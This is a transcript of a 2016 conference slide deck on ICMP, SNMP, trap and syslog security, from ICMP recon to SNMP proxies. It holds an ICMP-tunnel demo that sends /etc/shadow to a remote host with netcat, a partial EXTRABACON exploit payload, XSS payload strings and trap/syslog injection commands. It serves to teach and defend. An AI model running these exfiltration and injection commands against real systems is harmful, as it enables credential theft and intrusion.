the red headed step children: icmp, snmp and other network ... · what i do icmp snmp snmpv3 syslog...
TRANSCRIPT
The Red Headed Step Children: ICMP, SNMP and other network management protocols Download: www.tavve.com/swd
Chuck Craft
Tavve Software
@bubbasnmp
16.09.28
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
What I do
ICMP
SNMP
SNMPv3
syslog
TACACS ssh
telnet
RDP NTP
traps
NetFlow
Radius
https
sftp
scp
SIEM
NMS
NPM DMZ
Air gap
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
ICMP (Internet Control Message Protocol)
• RFC-792 – “ICMP, uses the basic support of IP as if it were a higher level protocol, however, ICMP is actually an integral part of IP, and must be implemented by every IP module.”
• Internet Protocol Number = 1 (TCP = 6, UDP = 17)
ICMP Header
Echo or Echo Reply Message
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum | - used by all ICMP
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number | - varies by TYPE
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ... - varies by TYPE
+-+-+-+-+-
• Type (8 bits) x Code (8 bits) = 65,536 possible ICMP message formats
• Today talking about Type 8 (echo Request), Type 0 (echo Reply) and Type 11 (Time Exceeded)
• Other often seen messages = Type 3 (Destination Unreachable) and Type 5 (Redirect)
Whitehat ICMP
• Availability (“ping”) – up/down – echo/reply • Latency (Round Trip Time) – RFC-889 • Applications (eHealth, Solarwinds,?) – ping before SNMP polling
• traceroute – path to host • MTU roulette (packet size)
ICMP utilities – traceroute
• Default is to use UDP. Add “-I” flag to use ICMP ECHO. • Microsoft “tracert” uses ICMP by default. (no option to change protocol) • Uses TTL (Time to Live) field in IP header. Originally seconds. Renamed to Hop Limit in IPv6.
# traceroute -I -n 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets
1 xxx.xxx.xxx.xxx 1.981 ms 2.943 ms 2.952 ms Type 8 (echo) sent / Type 11 (Time Exceeded) received 2 xxx.xxx.xxx.xxx 3.394 ms 3.404 ms 4.017 ms
3 xxx.xxx.xxx.xxx 89.191 ms 89.221 ms 90.041 ms
4 65.120.10.97 90.049 ms 90.050 ms 90.050 ms
5 205.171.166.33 90.050 ms 117.057 ms 117.088 ms
6 * * * Type 8 (echo) sent / no response received 7 209.85.143.188 112.775 ms 112.504 ms 112.270 ms
8 209.85.143.61 111.980 ms 58.631 ms 58.264 ms
9 209.85.244.209 83.153 ms 82.882 ms 99.668 ms
10 216.239.49.33 81.940 ms 81.332 ms 74.274 ms
11 * * *
12 8.8.8.8 208.090 ms 207.866 ms 205.455 ms Type 8 (echo) sent / Type 0 (echo Reply) received
Blackhat ICMP
How can attacker use ICMP for reconnaissance? - KoonYaw Tan (SANS) 4. Non-Conventional use
– 4.1 Reconnaissance – 4.2 Denial of Service (DoS) – 4.3 Covert Channel (https://www.sans.org/security-resources/idfaq/how-can-attacker-use-icmp-for-reconnaissance/3/13)
Project Loki: ICMP Tunneling (http://phrack.org/issues/49/6.html) ICMP Usage in Scanning (Version 3.0-2001) - Ofir Arkin ICMP based remote OS TCP/IP stack fingerprinting techniques (http://www.phrack.org/archives/issues/57/7.txt)
Unsolicited ICMP (nmap)
# nmap –v –A 192.168.200.50 (HP printer)
Destination Unreachable Message
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| unused |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Internet Header + 64 bits of Original Data Datagram |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Covert Channels / Exfil
• (extensible) Data Exfiltration Toolkit (DET) https://github.com/sensepost/DET
• Many ICMP tunnel programs.
https://en.wikipedia.org/wiki/ICMP_tunnel
icmptx – ICMP tunnel
Centos install: (Current status of RepoForge / RPMForge???) # curl -O http://mirror.hmc.edu/repoforge/redhat/el6/en/x86_64/rpmforge/RPMS/icmptx-0.01-2.el6.rf.x86_64.rpm
# rpm -Uvh ./icmptx-0.01-2.el6.rf.x86_64.rpm
ARM/Kali (Debian) install: - download code: https://github.com/jakkarth/icmptx
- icmptx.c: change tunnel ID from 7537 to 7530
/* run_icmp_tunnel(7537, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd); */
run_icmp_tunnel(7530, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd);
- build new binary with “make”
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number | - ID must match on both ends
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ...
+-+-+-+-+-
***
icmptx – Test setup
xxx.xxx.xxx.233 Centos 6.7 VM # icmptx -c 192.168.200.154
Created tunnel device: tun0
# ifconfig -a | grep -i tun
tun0 Link encap:UNSPEC
HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
# ifconfig tun0 inet 10.0.3.2 netmask 255.255.255.0
# netstat -nr
Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface
10.0.3.0 0.0.0.0 255.255.255.0 U 0 0 0 tun0
xxx.xxx.xxx.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
0.0.0.0 xxx.xxx.xxx.1 0.0.0.0 UG 0 0 0 eth0
# cat /etc/shadow | nc 10.0.3.1 8023
# wc -c /etc/shadow
584 /etc/shadow
xxx.xxx.xxx.154 Pi/ARM/Kali/Debian ~/icmptx/icmptx-0.2# ./icmptx -s 192.168.200.154
# ifconfig -a | grep -i tun
tun0: flags=4240<POINTOPOINT,NOARP,MULTICAST> mtu 1500
# ifconfig tun0 inet 10.0.3.1 netmask 255.255.255.0
# netstat -nr
Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 xxx.xxx.xxx.1 0.0.0.0 UG 0 0 0 eth0
10.0.3.0 0.0.0.0 255.255.255.0 U 0 0 0 tun0
xxx.xxx.xxx.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
# nc -l -p 8023
root:$6$MbrMNBHW$kNleGvjhRY6yRM<snip>:16908:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
<snip>
-c = client
-s = server
Trust No One – Verify All Received (Stateful FW or ICMP Proxy) Need outstanding
Echo or Echo Reply Message (Type 0)
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ...
+-+-+-+-+-
Time Exceeded Message (Type 11)
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| unused |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Internet Header + 64 bits of Original Data Datagram |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Destination Unreachable Message (Type 3)
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| unused |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Internet Header + 64 bits of Original Data Datagram |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
ICMP Type 8 with matching ID and Sequence
Outgoing packet matching IP header and Datagram (could be non-ICMP)
Outgoing packet matching IP header and Datagram
Scrub outgoing ICMP data
No data cleanup
Packet recreated. Options to maintain, replace or resize data field.
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
ICMP Proxy
20.20.20.15
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
No data cleanup
Internal Address Hiding
10.10.10.10
Request seen from 10.10.10.10
10.10.10.10
Request seen from 20.20.20.10
10.10.10.10
Request seen from 20.20.20.15
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
ICMP Proxy
20.20.20.15
Lock down nodes with ACLs
Multiple ACL entries 10.10.10.10 10.10.10.11 10.10.10.12
One or more ACL entries (Static, Dynamic or Overload NAT?)
One ACL entry 20.20.20.15
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
ICMP Proxy
20.20.20.15
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
@bubbasnmp ???
• http://www.simple-times.org/
• Case, McCloghrie, Rose, Waldbusser et al
• Ask Dr. SNMP – Jeff Case ``That dog won't hunt.''
SNMP Vulnerabilities - 2002
http://www.simple-times.org/pub/simple-times/issues/10-1.html
The Quarterly Newsletter of SNMP Technology, Comment, and Events
Volume 10, Number 1 - December, 2002
The Story Behind the SNMP Vulnerabilities
Tiina Havana, OUSPG / Ari Takanen, OUSPG (University of Oulu - Finland)
“SNMP is an old and mature protocol with numerous vendors providing solutions for it and even more numerous parties providing critical services over it.”
“ SNMP is also a complex protocol using an error prone ASN.1 encoding and containing various error prone data types over an unreliable network environment (UDP). “
“…. it was possible to prove that SNMP implementations were vulnerable and could be exploited if wanted.”
Shadow Brokers - 2016
“The new SNMP flaw, ….” “…. buffer overflow vulnerability”
“While Cisco has said all versions of ASA are affected by the underlying vulnerability in the Simple Network Messaging Protocol, the finding means that ExtraBacon poses a bigger threat than many security experts may have believed.”
EXTRABACON
https://blogs.cisco.com/security/shadow-brokers
“The EXTRABACON exploit targets a buffer overflow vulnerability in the SNMP code of the Cisco ASA, Cisco PIX, and Cisco Firewall Services Module.” “An attacker could exploit this vulnerability by sending crafted SNMP packets to an affected Cisco product.”
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
“The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.”
SNMP Agent / MIB
• SNMP: Simple Network Management Protocol
• MIB: Management Information Base
• Objects in MIB are addressed by OID (Object Identifier)
• SNMPv1, SNMPv2c: cleartext community string
• SNMPv3: more secure - encryption 1, time sensitive, engine IDs
Mgmt Server
SNMP Manager
Managed Node
SNMP Agent
MIB
snmpget
snmpget response Listens on UDP 161
snmpset
asynchronous trap UDP 162
1. https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
SNMP MIB tree / OIDs dot(.)
ccitt(0) iso(1) joint-iso-ccitt(2)
dod(6)
std(0) reg authority(1) member body(2) org(3)
internet(1)
directory(1) mgmt(2) experimental(3) private(4)
mib-2(1)
system(1) interfaces(2) at(3) ip(4) icmp(5) tcp(6) udp(7) egp(8) ….
sysDescr(1) sysObjectID(2) sysUptime(3) sysContact(4) sysLocation(5) ….
iso org dod internet mgmt mib system sysDescr
1 3 6 1 2 1 1 1 .1.3.6.1.2.1.1.1.0 TAVVE ZoneRanger v5.5
SNMP Private Enterprises dot(.)
ccitt(0) iso(1) joint-iso-ccitt(2)
dod(6)
std(0) reg authority(1) member body(2) org(3)
internet(1)
directory(1) mgmt(2) experimental(3) private(4)
enterprises(1)
Reserved(0) NxNetworks(1) IBM(2) CMU(3) ….. Cisco(9) HP(11)
oid = <ASN1_OID['.1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.47.5.173.53.165
.165.165.165.131.236.4.137.4.36.137.229
*** output omitted ****
44.144.144.144.144.144.144.141.123.131.9.139.124.36.20.139.7.255.224.144']>
Buffer Overflow
int add_num(char num1, char num2) {
char stuff[100];
char num_total;
stuff[200] = 99;
num_total = num1 + num2;
return num_total;
}
add_num:
@ args = 0, pretend = 0, frame = 112
@ frame_needed = 1, uses_anonymous_args = 0
@ link register save eliminated.
push {r7}
sub sp, sp, #116 Local variables allocated add r7, sp, #0
mov r3, r0
mov r2, r1
strb r3, [r7, #7]
mov r3, r2
strb r3, [r7, #6]
movs r3, #99
strb r3, [r7, #208] Write to La La Land ldrb r2, [r7, #7]
ldrb r3, [r7, #6]
add r3, r3, r2
strb r3, [r7, #111]
ldrb r3, [r7, #111] @ zero_extendqisi2
mov r0, r3
adds r7, r7, #116
mov sp, r7
@ sp needed
ldr r7, [sp], #4
bx lr
Scrub outgoing SNMP data
No data cleanup
Packet recreated. Verify meets RFC. Filter OIDs.
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
SNMP Proxy
20.20.20.15
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
No data cleanup
SNMPv3 (encryption)
Mgmt. apps must support SNMPv3
Proxy can translate v1, v2c -> SNMPv3
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
SNMP Proxy
20.20.20.15
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
Mgmt. apps must support SNMPv3
Internal Address Hiding
10.10.10.10
Request seen from 10.10.10.10
10.10.10.10
Request seen from 20.20.20.10
10.10.10.10
Request seen from 20.20.20.15
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
SNMP Proxy
20.20.20.15
Lock down nodes with ACLs
Multiple ACL entries 10.10.10.10 10.10.10.11 10.10.10.12
One or more ACL entries (Static, Dynamic or Overload NAT?)
One ACL entry 20.20.20.15
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
SNMP Proxy
20.20.20.15
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
Cross-Site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) “Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are
injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.”
Examples:
<script>alert("TEST");</script>
<body onload=alert('test1')>
<img src=http://badsite.net/gotya.swf>
<IMG SRC=jAvascript:alert('test2')> (a=A (UTF-8))
Data Validation
(https://twitter.com/sempf/status/514473420277694465) (https://www.sempf.net/post/On-Testing1.aspx)
Rapid7 Research
Rapid7 Identifier CVE Identifier Class Vendor Patched R7-2016-11.1 CVE-2016-5073 XSS CloudView Version 2.10a R7-2016-11.2 CVE-2016-5073 XSS Cloudview Version 2.10a R7-2016-11.3 CVE-2016-5074 Format String Cloudview Version 2.10a R7-2016-11.4 CVE-2016-5075 XSS Cloudview Version 2.10a R7-2016-11.5 CVE-2016-5076 DOA Cloudview Version 2.10a R7-2016-12 CVE-2016-5077 XSS Netikus Version 3.2.1.44 R7-2016-13 CVE-2016-5078 XSS Paessler Version 16.2.24.4045 R7-2016-14.1 CVE-2016-5642 XSS Opmantek Versions 8.5.12G R7-2016-14.2 CVE-2016-5642 XSS Opmantek Versions 8.5.12G, 4.3.7c R7-2016-14.3 CVE-2016-5642 XSS Opmantek Versions 8.5.12G, 4.3.7c R7-2016-14.4 CVE-2016-6534 Cmd Injection Opmantek Versions 8.5.12G, 4.3.7c
(https://community.rapid7.com/community/infosec/blog/2016/09/07/multiple-disclosures-for-multiple-network-management-systems-part-2)
Deral Heiland, Matthew Kienow – Managed to Mangled: Exploitation of Enterprise Network Management Systems (https://www.derbycon.com/events/managed-to-mangled-exploitation-of-enterprise-network-management-systems/) SNMP Data Harvesting During Penetration Testing - May 4, 2016 (https://community.rapid7.com/community/services/blog/2016/05/05/snmp-data-harvesting-during-penetration-testing)
Simple Network Management Protocol (SNMP) Best Practices - Jan 27, 2016 (https://community.rapid7.com/community/services/blog/2016/01/27/simple-network-management-protocol-snmp-best-practices)
Example string
# ./snmpRequest -p TRAP -v 2c 192.168.200.133/162
"1.3.6.1.2.1.1.3.0={t}0"
"1.3.6.1.6.3.1.1.4.1.0={o}1.3.6.1.4.1.9.0.1"
"1.3.6.1.6.3.1.1.4.1.0={s}\<src=http://181.224.145.117/wp-
content/uploads/2015/11/tavve_logo.gif.gif/\>“
snmpRequest is wrapper for snmp4j.jar
# ./java -jar /root/syslog4j-0.9.46-bin.jar -h 192.168.200.133 udp
"\<src=http://181.224.145.117/wp-
content/uploads/2015/11/tavve_logo.gif.gif/\>"
Good Apps
snmpTrapOID.0=<src=<span class='eventHref'> http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/>'</span> “<“ “<” “>” “>”
Bad App
/var/www/html/cgi-bin# cat showlog
#!/bin/sh
echo "<HTML>"
echo "Last 100 lines of /var/log/syslog:<br><pre>"
date
date | sed -e "s/./-/g"
/usr/bin/tail -n 100 /var/log/syslog 2>&1
echo "</BODY></HTML>“
http://xxx.xxx.xxx.xxx/cgi-bin/showlog Last 100 lines of /var/log/syslog:
Sun Sep 25 02:59:06 UTC 2016
---------------------------- Sep 25 01:49:12 kali lighttpd[7303]: Syntax OK
Sep 25 01:49:12 kali systemd[1]: Started Lighttpd Daemon.
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_accesslog more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_cgi more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_status more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:44 kali systemd[1]: Stopping Lighttpd Daemon...
Sep 25 01:49:44 kali systemd[1]: Stopped Lighttpd Daemon.
<snip>
Bad App Results
<snip>
Sep 25 02:34:03 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:34:34 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:34:58 kali lighttpd[8372]: cat: /var/log/messages: Permission denied
Sep 25 02:35:01 kali CRON[8455]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 25 02:38:30 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:39:12 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:40:34 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:45:01 kali CRON[8550]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 25 02:47:27 kali root: chuckc
Sep 25 02:48:57 kali root: \
Sep 25 02:50:22 kali root: \
Sep 25 02:51:06 kali root: \
Sep 25 02:55:01 kali CRON[8627]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Filter/fix Incoming traps/syslogs
No data cleanup
UDP=SNMP Traps, Syslog, Netflow Packet recreated. Options to maintain or replace data field. Filter packets.
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
UDP Proxy
20.20.20.15
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
10.10.10.10
10.10.10.11
10.10.10.12
No data cleanup
Internal Address Hiding
10.10.10.10
Trap/Syslog Dest : 10.10.10.10
10.10.10.10
Trap/Syslog Dest : 20.20.20.10
10.10.10.10
Trap/Syslog Dest: 20.20.20.15
Normal IP Routing
FW NATs internal
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10
UDP Proxy
20.20.20.15
Reduce Destination List
Trap Destinations: 10.10.10.10 10.10.10.11 10.10.10.12
Trap Destinations: 20.20.20.10 20.20.20.11 20.20.20.12
Trap Destination: 20.20.20.15
(proxy does fanout)
Normal IP Routing
FW Static NAT inside
20.20.20.20
20.20.20.20
20.20.20.20
20.20.20.10 20.20.20.11 20.20.20.12
UDP Proxy
20.20.20.15
10.10.10.10 Prod1
10.10.10.11 Prod2
10.10.10.12 Test
10.10.10.10 Prod1
10.10.10.11 Prod2
10.10.10.12 Test
10.10.10.10 Prod1
10.10.10.11 Prod2
10.10.10.12 Test
The Red Headed Step Children: ICMP, SNMP and other network management protocols Download: www.tavve.com/swd
Chuck Craft
Tavve Software
@bubbasnmp
16.09.28